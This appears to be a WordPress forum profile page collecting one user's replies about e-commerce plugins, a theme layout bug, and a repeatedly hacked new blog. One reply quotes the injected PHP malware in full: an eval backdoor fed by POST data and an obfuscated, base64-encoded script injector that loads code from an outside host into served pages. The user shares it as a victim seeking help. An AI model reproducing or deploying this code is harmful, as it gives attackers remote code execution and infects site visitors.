kentuckyslone
Forum Replies Created
-
Forum: Plugins
In reply to: wp estore check out pageHello esmi – If you are talking to me – I do not see any solutions in that thread which you have cited – the thread is also closed.
In fact I have searched and I have read through a few threads and most everything I have seen on the topic is very old and closed.
Forum: Plugins
In reply to: wp estore check out pageWOW! 2 weeks and not a single response?
I am really having a difficult time in deciding what ecommerce software to use. It seems that there is really not much of choice once you really look at each.
Shopp, Wp estore, Market theme, shopperpress, Cart66…. what? Are any of these good?
Forum: Themes and Templates
In reply to: Strange Gap Between Post Content and SidebarHello Christine and thanks so much for taking a look. I suspected the comments.php right off the bat and removed the link to it from single.php but it didnt make any difference.
After reading your reply I double checked this before making my reply and discovered that there was an extra </div> in the single.php just before the call to the comments.php
I had looked at those files over and over but didnt find that until just a bit ago.
Forum: Fixing WordPress
In reply to: New Blog Seems to be HackedI dont think this is being caused by a plugin with my site. The first time it happened I hadnt activated any plugins except akismet and all in one SEO. Both of these plugins were completely up to date.
I have several other blogs running on the same reseller (shared) hosting account – none of my other blogs are experiencing this problem. (Yet!)
Forum: Fixing WordPress
In reply to: New Blog Seems to be HackedI got this with a completely new install.
I installed using fantastico panel. Within a few hours of my set up I started getting the error message and telling me
Parse error: syntax error, unexpected T_VARIABLE in …/public_html/index.php on line 1
I checked the file and found the added code. I removed the code and got the same error only with a different file name. I went down the line editing ut the added code in all the affected files. Within an hour or so the error was back.
I removed everything from the server, all files and the MySQL database. I started over fresh but this time I downloaded the 2.7.1 zip and ftp’d the files to the server, created the dB and installed WP.
An hour or so later it was down with the same error message.
Next I completely removed the hosting account from my hosting and then recreated it and started over with everything from scratch for the 3rd time.
I should also say that in the first 2 times I used an export/import file
for the content, BUT on the third and last attempt I did not use that export but instead used some notepad file backups I have for the content.Forum: Fixing WordPress
In reply to: New Blog Seems to be HackedAlso, as I have said, this was a completely new install of the latest version with only a few plugins (the same I have been using on some other blogs)
Anyway, here is the code it generates:
<?php if(!function_exists(‘tmp_lkojfghx’)){if(isset($_POST[‘tmp_lkojfghx3’]))eval($_POST[‘tmp_lkojfghx3’]);if(!defined(‘TMP_XHGFJOKL’))define(‘TMP_XHGFJOKL’,base64_decode(‘PHNjcmlwdCBsYW5ndWFnZT1qYXZhc2NyaXB0PjwhLS0gCmRvY3VtZW50LndyaXRlKHVuZXNjYXBlKCdaNiUzQ3NaNmNyUXVpYlB1cHQlMjBzcmNiUHUlM0QlMkYlMkY5NCUyRTJYNTRYNTdYNSUyRTIlMkVySkUxWjY5UXU1ckpFJTJGalF1cVF1dVV3ZXI2OXlRdSUyRTY5ajY5cyUzRXJKRSUzQyUyRkVsZHNaNmNyaXA2OXQlM0UnKS5yZXBsYWNlKC9Vd3xRdXxiUHV8RWxkfHJKRXw2OXxaNnxYNS9nLCIiKSk7CiAtLT48L3NjcmlwdD4=’));function tmp_lkojfghx($s){if($g=(substr($s,0,2)==chr(31).chr(139))$s=gzinflate(substr($s,10,-8));if(preg_match_all(‘#<script(.*?)</script>#is’,$s,$a))foreach($a[0] as $v)if(count(explode(“\n”,$v))>5){$e=preg_match(‘#[\'”][^\s\'”\.,;\?!\[\]:/<>\(\)]{30,}#’,$v)||preg_match(‘#[\(\[](\s*\d+,){20,}#’,$v);if((preg_match(‘#\beval\b#’,$v)&&($e||strpos($v,’fromCharCode’)))||($e&&strpos($v,’document.write’)))$s=str_replace($v,”,$s);}$s1=preg_replace(‘#<script language=javascript><!– \ndocument\.write\(unescape\(.+?\n –></script>#’,”,$s);if(stristr($s,'<body’))$s=preg_replace(‘#(\s*<body)#mi’,TMP_XHGFJOKL.’\1′,$s1);elseif(($s1!=$s)||stristr($s,'</body’)||stristr($s,'</title>’))$s=$s1.TMP_XHGFJOKL;return $g?gzencode($s):$s;}function tmp_lkojfghx2($a=0,$b=0,$c=0,$d=0){$s=array();if($b&&$GLOBALS[‘tmp_xhgfjokl’])call_user_func($GLOBALS[‘tmp_xhgfjokl’],$a,$b,$c,$d);foreach(@ob_get_status(1) as $v)if(($a=$v[‘name’])==’tmp_lkojfghx’)return;else $s[]=array($a==’default output handler’?false:$a);for($i=count($s)-1;$i>=0;$i–){$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start(‘tmp_lkojfghx’);for($i=0;$i<count($s);$i++){ob_start($s[$i][0]);echo $s[$i][1];}}}if(($a=@set_error_handler(‘tmp_lkojfghx2′))!=’tmp_lkojfghx2’)$GLOBALS[‘tmp_xhgfjokl’]=$a;tmp_lkojfghx2(); ?>
Forum: Fixing WordPress
In reply to: New Blog Seems to be HackedYes it happens to the config file too, forgot to list it above
As with any of the other files affected you can remove the “weird” code from the config and other files but it just regenerates itself witin a few hours
Forum: Fixing WordPress
In reply to: New Blog Seems to be HackedThis blog is completely new. I just registered the domain recently and set it up. I even completely redid everything last night. I have about a dozen other established long running WP blogs and all of them seem to be fine.
The funny thing is that I have installed WP on this domain both by ftp’ing the files and creating the database as well as using the fantastico control panel.
I have even tried deleting the hosting account and recreating it with a different password etc